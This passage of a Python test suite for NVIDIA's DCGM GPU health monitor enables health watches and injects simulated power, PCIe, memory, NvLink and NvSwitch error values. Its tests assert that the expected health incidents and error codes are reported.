@test_utils.run_with_standalone_host_engine(20)
@test_utils.run_with_initialized_client()
def test_dcgm_standalone_health_set_power(handle):
    """
    Verifies that the set/get path for the health monitor is working
    Checks for call errors are done in the bindings
    """
    handleObj = pydcgm.DcgmHandle(handle=handle)
    systemObj = handleObj.GetSystem()
    groupObj = systemObj.GetDefaultGroup()
    # Start from a clean slate: no watches enabled
    groupObj.health.Set(0)
    currentSystems = groupObj.health.Get()
    assert (currentSystems == 0)
    # Enable the power watch and confirm it round-trips through Get()
    newSystems = currentSystems | dcgm_structs.DCGM_HEALTH_WATCH_POWER
    groupObj.health.Set(newSystems)
    currentSystems = groupObj.health.Get()
    assert (currentSystems == newSystems)
def helper_check_health_response_v4(gpuIds, response):
    """Assert that a v4 health response is well-formed and fully healthy.

    Every problem found is logged before the final assertion fires, so the log
    shows all issues rather than just the first one.
    """
    problems = []
    if response.version == 0:
        problems.append("bad response.version x%X" % response.version)
    if response.overallHealth != dcgm_structs.DCGM_HEALTH_RESULT_PASS:
        problems.append("bad response.overallHealth %d. Are these GPUs really healthy?" % response.overallHealth)
    if response.incidentCount > 0:
        problems.append("bad response.incidentCount %d > 0" % (response.incidentCount))
    for problem in problems:
        logger.error(problem)
    assert not problems, "Errors were encountered. See above."
def helper_run_dcgm_health_check_sanity(handle, gpuIds, system_to_check):
    """
    Verifies that the DCGM health checks return healthy for all GPUs on live systems.
    """
    systemObj = pydcgm.DcgmHandle(handle=handle).GetSystem()
    gpuGroup = systemObj.GetGroupWithGpuIds('testgroup', gpuIds)
    gpuGroup.health.Set(system_to_check)
    systemObj.UpdateAllFields(1)

    # Check() throws an exception on error; a clean response is validated below
    healthResponse = gpuGroup.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    helper_check_health_response_v4(gpuIds, healthResponse)
################ Start health sanity checks
# The health sanity checks verify that the DCGM health checks return healthy for all GPUs on live systems.
# Note: These tests can fail if a GPU is really unhealthy. We should give detailed feedback so that this is attributed
# to the GPU and not the test
# Each watch system below is exercised twice: once against an embedded host
# engine and once against a standalone host engine over a client connection.

@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_pcie(handle, gpuIds):
    helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_PCIE)

@test_utils.run_with_standalone_host_engine()
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_pcie_standalone(handle, gpuIds):
    helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_PCIE)

@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_mem(handle, gpuIds):
    helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_MEM)

@test_utils.run_with_standalone_host_engine()
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_mem_standalone(handle, gpuIds):
    helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_MEM)

@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_inforom(handle, gpuIds):
    helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_INFOROM)

@test_utils.run_with_standalone_host_engine()
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_inforom_standalone(handle, gpuIds):
    helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_INFOROM)

@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_thermal(handle, gpuIds):
    helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_THERMAL)

@test_utils.run_with_standalone_host_engine()
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_thermal_standalone(handle, gpuIds):
    helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_THERMAL)

@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_power(handle, gpuIds):
    helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_POWER)

@test_utils.run_with_standalone_host_engine()
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_power_standalone(handle, gpuIds):
    helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_POWER)

@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_nvlink(handle, gpuIds):
    #We will get false failures if any nvlinks are down on the GPUs
    test_utils.skip_test_if_any_nvlinks_down(handle)
    helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_NVLINK)

@test_utils.run_with_standalone_host_engine()
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_nvlink_standalone(handle, gpuIds):
    #We will get false failures if any nvlinks are down on the GPUs
    test_utils.skip_test_if_any_nvlinks_down(handle)
    helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_NVLINK)

@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_nvswitch_nonfatal(handle, gpuIds):
    helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_NVSWITCH_NONFATAL)

@test_utils.run_with_standalone_host_engine()
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_nvswitch_nonfatal_standalone(handle, gpuIds):
    helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_NVSWITCH_NONFATAL)

@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_nvswitch_fatal(handle, gpuIds):
    helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_NVSWITCH_FATAL)

@test_utils.run_with_standalone_host_engine()
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_nvswitch_fatal_standalone(handle, gpuIds):
    helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_NVSWITCH_FATAL)
################ End health sanity checks
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_standalone_health_check_power(handle, gpuIds):
    """
    Verifies that a check error occurs when an error is injected
    Checks for call errors are done in the bindings except dcgmClientHealthCheck
    """
    handleObj = pydcgm.DcgmHandle(handle=handle)
    systemObj = handleObj.GetSystem()
    groupObj = systemObj.GetEmptyGroup("test1")
    groupObj.AddGpu(gpuIds[0])
    gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
    gpuId = gpuIds[0]

    newSystems = dcgm_structs.DCGM_HEALTH_WATCH_POWER
    groupObj.health.Set(newSystems)

    # Seed a clean baseline sample: value 0 at offset -50 (presumably seconds
    # relative to now — see dcgm_internal_helpers.inject_field_value_i64).
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_POWER_VIOLATION,
                                                       0, -50)
    assert (ret == dcgm_structs.DCGM_ST_OK)

    skip_test_if_unhealthy(groupObj)

    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)

    # we expect that there will be no data here

    # inject an error into power
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_POWER_VIOLATION,
                                                       1000, 10)
    assert (ret == dcgm_structs.DCGM_ST_OK)

    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    # The injected power violation must surface as exactly one incident on our
    # GPU, attributed to the POWER watch with the clock-throttle error code.
    assert (responseV4.incidentCount == 1)
    assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
    assert (responseV4.incidents[0].entityInfo.entityId == gpuIds[0])
    assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_POWER)
    assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_CLOCK_THROTTLE_POWER)
# NvLink error-counter health check, run against both engine modes.
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_standalone_health_check_nvlink(handle, gpuIds):
    helper_health_check_nvlink_error_counters(handle, gpuIds)

@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_embedded_health_check_nvlink(handle, gpuIds):
    helper_health_check_nvlink_error_counters(handle, gpuIds)
@test_utils.run_with_standalone_host_engine(20)
@test_utils.run_with_initialized_client()
def test_dcgm_standalone_health_set_nvlink(handle):
    """
    Exercise the health-watch set/get round trip for the NVLINK system.

    Argument/return-code validation is already done inside the python
    bindings; this test only confirms that the value written with Set()
    is the value read back with Get().
    """
    dcgmHandle = pydcgm.DcgmHandle(handle=handle)
    dcgmSystem = dcgmHandle.GetSystem()
    group = dcgmSystem.GetDefaultGroup()

    # Clear every watch and confirm the monitor reports none.
    group.health.Set(0)
    cleared = group.health.Get()
    assert (cleared == 0)

    # Enable the NvLink watch on top of the (empty) current set and confirm
    # Get() reflects it.
    watches = cleared | dcgm_structs.DCGM_HEALTH_WATCH_NVLINK
    group.health.Set(watches)
    assert (group.health.Get() == watches)
def helper_health_check_nvlink_error_counters(handle, gpuIds):
    """
    Verifies that a check error occurs when an error is injected
    Checks for call errors are done in the bindings except dcgmClientHealthCheck
    """
    #We will get false failures if any nvlinks are down on the GPUs
    test_utils.skip_test_if_any_nvlinks_down(handle)

    handleObj = pydcgm.DcgmHandle(handle=handle)
    systemObj = handleObj.GetSystem()
    groupObj = systemObj.GetEmptyGroup("test1")
    groupObj.AddGpu(gpuIds[0])
    gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
    gpuId = gpuIds[0]

    newSystems = dcgm_structs.DCGM_HEALTH_WATCH_NVLINK
    groupObj.health.Set(newSystems)

    # Baseline sample: CRC flit error count of 0 at offset -50.
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId,
                                                       dcgm_fields.DCGM_FI_DEV_NVLINK_CRC_FLIT_ERROR_COUNT_TOTAL,
                                                       0, -50)
    assert (ret == dcgm_structs.DCGM_ST_OK)

    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)

    # NOTE(review): this injection is identical to the baseline above (value 0,
    # offset -50); presumably it re-seeds the baseline after the Check() call —
    # confirm whether both injections are required.
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId,
                                                       dcgm_fields.DCGM_FI_DEV_NVLINK_CRC_FLIT_ERROR_COUNT_TOTAL,
                                                       0, -50)
    assert (ret == dcgm_structs.DCGM_ST_OK)

    # we expect that there will be no data here

    # inject an error into NV Link
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId,
                                                       dcgm_fields.DCGM_FI_DEV_NVLINK_CRC_FLIT_ERROR_COUNT_TOTAL,
                                                       100, 10)
    assert (ret == dcgm_structs.DCGM_ST_OK)

    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    # The rising CRC flit error count must produce a single WARN incident for
    # our GPU under the NVLINK watch system.
    assert (responseV4.incidentCount == 1)
    assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
    assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
    assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_NVLINK)
    assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_NVLINK_ERROR_THRESHOLD)
    assert (responseV4.incidents[0].health == dcgm_structs.DCGM_HEALTH_RESULT_WARN)
def helper_nvlink_check_fatal_errors(handle, gpuIds):
    """
    Verifies that an injected NvLink recovery error is reported as a FAIL
    incident (DCGM_FR_NVLINK_ERROR_CRITICAL) by the NVLINK health watch.
    """
    test_utils.skip_test_if_any_nvlinks_down(handle)

    handleObj = pydcgm.DcgmHandle(handle=handle)
    systemObj = handleObj.GetSystem()
    groupObj = systemObj.GetEmptyGroup("test1")
    groupObj.AddGpu(gpuIds[0])
    gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
    gpuId = gpuIds[0]

    newSystems = dcgm_structs.DCGM_HEALTH_WATCH_NVLINK
    groupObj.health.Set(newSystems)

    # Baseline sample: recovery error count of 0 at offset -50.
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId,
                                                       dcgm_fields.DCGM_FI_DEV_NVLINK_RECOVERY_ERROR_COUNT_TOTAL,
                                                       0, -50)
    assert (ret == dcgm_structs.DCGM_ST_OK)

    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)

    # A recovery error count of 1 is expected to be treated as fatal below.
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId,
                                                       dcgm_fields.DCGM_FI_DEV_NVLINK_RECOVERY_ERROR_COUNT_TOTAL,
                                                       1, -50)
    assert (ret == dcgm_structs.DCGM_ST_OK)

    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    assert (responseV4.overallHealth == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
    assert (responseV4.incidentCount == 1)
    assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
    assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
    assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_NVLINK)
    assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_NVLINK_ERROR_CRITICAL)
    assert (responseV4.incidents[0].health == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
# NvLink fatal (recovery-error) health check, run against both engine modes.
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_standalone_nvlink_fatal(handle, gpuIds):
    helper_nvlink_check_fatal_errors(handle, gpuIds)

@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_embedded_nvlink_fatal(handle, gpuIds):
    helper_nvlink_check_fatal_errors(handle, gpuIds)
def helper_nvlink_crc_fatal_threshold(handle, gpuIds):
    """
    Verifies that an excessive CRC flit error rate is reported as a FAIL
    incident (DCGM_FR_NVLINK_CRC_ERROR_THRESHOLD) by the NVLINK health watch.
    """
    test_utils.skip_test_if_any_nvlinks_down(handle)

    handleObj = pydcgm.DcgmHandle(handle=handle)
    systemObj = handleObj.GetSystem()
    groupObj = systemObj.GetEmptyGroup("test1")
    groupObj.AddGpu(gpuIds[0])
    gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
    gpuId = gpuIds[0]

    newSystems = dcgm_structs.DCGM_HEALTH_WATCH_NVLINK
    groupObj.health.Set(newSystems)

    # Baseline sample: CRC flit error count of 0 at offset -50.
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId,
                                                       dcgm_fields.DCGM_FI_DEV_NVLINK_CRC_FLIT_ERROR_COUNT_TOTAL,
                                                       0, -50)
    assert (ret == dcgm_structs.DCGM_ST_OK)

    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)

    # Trigger a failure by having more than 100 CRC errors per second
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId,
                                                       dcgm_fields.DCGM_FI_DEV_NVLINK_CRC_FLIT_ERROR_COUNT_TOTAL,
                                                       1000000, -20)
    assert (ret == dcgm_structs.DCGM_ST_OK)

    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    assert (responseV4.overallHealth == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
    assert (responseV4.incidentCount == 1)
    assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
    assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
    assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_NVLINK)
    assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_NVLINK_CRC_ERROR_THRESHOLD)
    assert (responseV4.incidents[0].health == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
# NvLink CRC error-rate threshold check, run against both engine modes.
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_standalone_nvlink_crc_threshold(handle, gpuIds):
    helper_nvlink_crc_fatal_threshold(handle, gpuIds)

@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_embedded_nvlink_crc_threshold(handle, gpuIds):
    helper_nvlink_crc_fatal_threshold(handle, gpuIds)
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_standalone_health_large_groupid(handle, gpuIds):
    """
    Verifies that a health check can run on a large groupId
    This verifies the fix for bug 1868821
    """
    handleObj = pydcgm.DcgmHandle(handle=handle)
    systemObj = handleObj.GetSystem()

    #Make a bunch of groups and delete them right away so our next groupId is large
    for i in range(100):
        groupObj = systemObj.GetEmptyGroup("test_group_%d" % i)
        groupObj.Delete()

    groupObj = systemObj.GetEmptyGroup("test_good_group")
    groupObj.AddGpu(gpuIds[0])
    groupId = groupObj.GetId().value
    # Format the plain int groupId, not the ctypes object returned by GetId():
    # "%d" against a ctypes instance raises TypeError on the failure path,
    # which would mask the real assertion message.
    assert groupId >= 100, "Expected groupId >= 100. got %d" % groupId

    newSystems = dcgm_structs.DCGM_HEALTH_WATCH_ALL

    #Any of these will throw an exception on error. Making it past these = success
    groupObj.health.Set(newSystems)
    systemObj.UpdateAllFields(True)
    groupObj.health.Get()
    groupObj.health.Check()
def helper_health_check_nvswitch_errors(handle, switchIds, fieldId, healthSystem, healthResult, errorCode):
    """
    Verifies that a check error occurs when an error is injected
    Checks for call errors are done in the bindings except dcgmClientHealthCheck

    Injects values for `fieldId` on the first switch in `switchIds` and
    asserts that health.Check() reports exactly one incident carrying the
    given `healthSystem`, `healthResult` and `errorCode`.
    """
    #This test will fail if any NvLinks are down
    test_utils.skip_test_if_any_nvlinks_down(handle)

    handleObj = pydcgm.DcgmHandle(handle=handle)
    systemObj = handleObj.GetSystem()
    groupObj = systemObj.GetEmptyGroup("test1")
    switchId = switchIds[0]
    groupObj.AddEntity(dcgm_fields.DCGM_FE_SWITCH, switchId)

    newSystems = healthSystem
    groupObj.health.Set(newSystems)

    field = dcgm_structs_internal.c_dcgmInjectFieldValue_v1()
    field.version = dcgm_structs_internal.dcgmInjectFieldValue_version1
    field.fieldId = fieldId
    field.status = 0
    field.fieldType = ord(dcgm_fields.DCGM_FT_INT64)
    # Timestamps are microseconds; seed a zero-value sample 5 seconds ago.
    field.ts = int((time.time()-5) * 1000000.0)
    field.value.i64 = 0
    ret = dcgm_agent_internal.dcgmInjectEntityFieldValue(handle, dcgm_fields.DCGM_FE_SWITCH,
                                                         switchId, field)
    assert (ret == dcgm_structs.DCGM_ST_OK)

    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)

    # Second zero-value sample, timestamped 50 seconds ago.
    field.ts = int((time.time()-50) * 1000000.0)
    field.value.i64 = 0
    ret = dcgm_agent_internal.dcgmInjectEntityFieldValue(handle, dcgm_fields.DCGM_FE_SWITCH,
                                                         switchId, field)
    assert (ret == dcgm_structs.DCGM_ST_OK)

    # we expect that there will be no data here

    # inject an error into NvSwitch
    field.ts = int((time.time() - 1) * 1000000.0) # set the injected data for a second ago
    field.value.i64 = 5
    ret = dcgm_agent_internal.dcgmInjectEntityFieldValue(handle, dcgm_fields.DCGM_FE_SWITCH,
                                                         switchId, field)
    assert (ret == dcgm_structs.DCGM_ST_OK)

    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    # Exactly one incident, attributed to our switch with the caller-supplied
    # system, severity and error code.
    assert (responseV4.incidentCount == 1)
    assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_SWITCH)
    assert (responseV4.incidents[0].entityInfo.entityId == switchId)
    assert (responseV4.incidents[0].health == healthResult)
    assert (responseV4.incidents[0].system == healthSystem)
    assert (responseV4.incidents[0].error.code == errorCode)
# NvSwitch fatal/non-fatal error checks, each run against both engine modes
# with injected (fake) NvSwitches.
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_with_injection_nvswitches()
def test_health_check_nvswitch_fatal_errors_standalone(handle, switchIds):
    helper_health_check_nvswitch_errors(handle, switchIds,
                                        dcgm_fields.DCGM_FI_DEV_NVSWITCH_FATAL_ERRORS,
                                        dcgm_structs.DCGM_HEALTH_WATCH_NVSWITCH_FATAL,
                                        dcgm_structs.DCGM_HEALTH_RESULT_FAIL,
                                        dcgm_errors.DCGM_FR_NVSWITCH_FATAL_ERROR)

@test_utils.run_with_embedded_host_engine()
@test_utils.run_with_injection_nvswitches()
def test_health_check_nvswitch_fatal_errors_embedded(handle, switchIds):
    helper_health_check_nvswitch_errors(handle, switchIds,
                                        dcgm_fields.DCGM_FI_DEV_NVSWITCH_FATAL_ERRORS,
                                        dcgm_structs.DCGM_HEALTH_WATCH_NVSWITCH_FATAL,
                                        dcgm_structs.DCGM_HEALTH_RESULT_FAIL,
                                        dcgm_errors.DCGM_FR_NVSWITCH_FATAL_ERROR)

@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_with_injection_nvswitches()
def test_health_check_nvswitch_nonfatal_errors_standalone(handle, switchIds):
    helper_health_check_nvswitch_errors(handle, switchIds,
                                        dcgm_fields.DCGM_FI_DEV_NVSWITCH_NON_FATAL_ERRORS,
                                        dcgm_structs.DCGM_HEALTH_WATCH_NVSWITCH_NONFATAL,
                                        dcgm_structs.DCGM_HEALTH_RESULT_WARN,
                                        dcgm_errors.DCGM_FR_NVSWITCH_NON_FATAL_ERROR)

@test_utils.run_with_embedded_host_engine()
@test_utils.run_with_injection_nvswitches()
def test_health_check_nvswitch_nonfatal_errors_embedded(handle, switchIds):
    helper_health_check_nvswitch_errors(handle, switchIds,
                                        dcgm_fields.DCGM_FI_DEV_NVSWITCH_NON_FATAL_ERRORS,
                                        dcgm_structs.DCGM_HEALTH_WATCH_NVSWITCH_NONFATAL,
                                        dcgm_structs.DCGM_HEALTH_RESULT_WARN,
                                        dcgm_errors.DCGM_FR_NVSWITCH_NON_FATAL_ERROR)
def helper_health_check_nvlink_link_down_gpu(handle, gpuIds):
    """
    Verifies that a check error occurs when a NvLink link is set to broken
    """
    handleObj = pydcgm.DcgmHandle(handle=handle)
    systemObj = handleObj.GetSystem()
    groupObj = systemObj.GetEmptyGroup("test1")
    groupObj.AddGpu(gpuIds[0])
    gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
    gpuId = gpuIds[0]

    #Set all links of our injected GPU to Up
    for linkId in range(dcgm_structs.DCGM_NVLINK_MAX_LINKS_PER_GPU):
        dcgm_agent_internal.dcgmSetEntityNvLinkLinkState(handle, dcgm_fields.DCGM_FE_GPU, gpuId, linkId, dcgm_structs.DcgmNvLinkLinkStateUp)

    newSystems = dcgm_structs.DCGM_HEALTH_WATCH_NVLINK
    groupObj.health.Set(newSystems)

    #By default, the health check should pass
    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    assert responseV4.incidentCount == 0, "Expected no errors. Got %d errors" % responseV4.incidentCount

    #Set a link to Down
    linkId = 3
    dcgm_agent_internal.dcgmSetEntityNvLinkLinkState(handle, dcgm_fields.DCGM_FE_GPU, gpuId, linkId, dcgm_structs.DcgmNvLinkLinkStateDown)

    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    logger.info("Health String: " + responseV4.incidents[0].error.msg)
    # Exactly one NVLINK_DOWN incident against our GPU; its message must name
    # the downed link.
    assert (responseV4.incidentCount == 1)
    assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
    assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
    assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_NVLINK)
    assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_NVLINK_DOWN)
    assert str(linkId) in (responseV4.incidents[0].error.msg), "Didn't find linkId %d in %s" % (linkId, responseV4.incidents[0].error.msg)
# GPU NvLink link-down detection, run against both engine modes with
# injected (fake) GPUs.
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_with_injection_gpus()
def test_health_check_nvlink_link_down_gpu_standalone(handle, gpuIds):
    helper_health_check_nvlink_link_down_gpu(handle, gpuIds)

@test_utils.run_with_embedded_host_engine()
@test_utils.run_with_injection_gpus()
def test_health_check_nvlink_link_down_gpu_embedded(handle, gpuIds):
    helper_health_check_nvlink_link_down_gpu(handle, gpuIds)
def helper_health_check_nvlink_link_down_nvswitch(handle, switchIds):
    """
    Verifies that a check error occurs when a NvLink link is set to broken
    """
    handleObj = pydcgm.DcgmHandle(handle=handle)
    systemObj = handleObj.GetSystem()
    groupObj = systemObj.GetEmptyGroup("test1")
    switchId = switchIds[0]
    groupObj.AddEntity(dcgm_fields.DCGM_FE_SWITCH, switchId)
    linkId = 17

    newSystems = dcgm_structs.DCGM_HEALTH_WATCH_NVSWITCH_FATAL
    groupObj.health.Set(newSystems)

    #By default, the health check should pass
    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    assert responseV4.incidentCount == 0, "Expected no errors. Got %d entities with errors: %s" % (responseV4.incidentCount, responseV4.incidents[0].error.msg)

    #Set a link to Down
    dcgm_agent_internal.dcgmSetEntityNvLinkLinkState(handle, dcgm_fields.DCGM_FE_SWITCH, switchId, linkId, dcgm_structs.DcgmNvLinkLinkStateDown)

    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    # Exactly one NVLINK_DOWN incident against the switch; its message must
    # name the downed link.
    assert (responseV4.incidentCount == 1)
    assert (responseV4.incidents[0].entityInfo.entityId == switchId)
    assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_SWITCH)
    assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_NVSWITCH_FATAL)
    assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_NVLINK_DOWN)
    assert str(linkId) in responseV4.incidents[0].error.msg, "Didn't find linkId %d in %s" % (linkId, responseV4.incidents[0].error.msg)
# NvSwitch NvLink link-down detection, run against both engine modes with
# injected (fake) NvSwitches.
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_with_injection_nvswitches()
def test_health_check_nvlink_link_down_nvswitch_standalone(handle, switchIds):
    helper_health_check_nvlink_link_down_nvswitch(handle, switchIds)

@test_utils.run_with_embedded_host_engine()
@test_utils.run_with_injection_nvswitches()
def test_health_check_nvlink_link_down_nvswitch_embedded(handle, switchIds):
    helper_health_check_nvlink_link_down_nvswitch(handle, switchIds)
def helper_health_check_multiple_failures(handle, gpuIds):
    """
    Injects a PCIe replay error and a volatile double-bit ECC error at the
    same time and verifies that BOTH incidents are reported for the GPU.
    The relative order of the two incidents in the response is not assumed.
    """
    handleObj = pydcgm.DcgmHandle(handle=handle)
    systemObj = handleObj.GetSystem()
    groupObj = systemObj.GetEmptyGroup("test1")
    groupObj.AddGpu(gpuIds[0])
    gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
    gpuId = gpuIds[0]

    # We are going to trigger two failures at the same time
    newSystems = dcgm_structs.DCGM_HEALTH_WATCH_PCIE | dcgm_structs.DCGM_HEALTH_WATCH_MEM
    groupObj.health.Set(newSystems)
    skip_test_if_unhealthy(groupObj)

    # Baseline: PCIe replay count of 0 at offset -50.
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_PCIE_REPLAY_COUNTER,
                                                       0, -50)
    assert (ret == dcgm_structs.DCGM_ST_OK)

    # inject a PCI error and a memory error, and make sure we report both
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_ECC_DBE_VOL_TOTAL,
                                                       4, 100)
    assert (ret == dcgm_structs.DCGM_ST_OK)
    ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_PCIE_REPLAY_COUNTER,
                                                       100, 100)
    assert (ret == dcgm_structs.DCGM_ST_OK)

    responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
    assert (responseV4.incidentCount == 2)
    assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
    assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
    assert (responseV4.incidents[1].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
    assert (responseV4.incidents[1].entityInfo.entityId == gpuId)

    # The two incidents may come back in either order; branch on which watch
    # system occupies position 0.
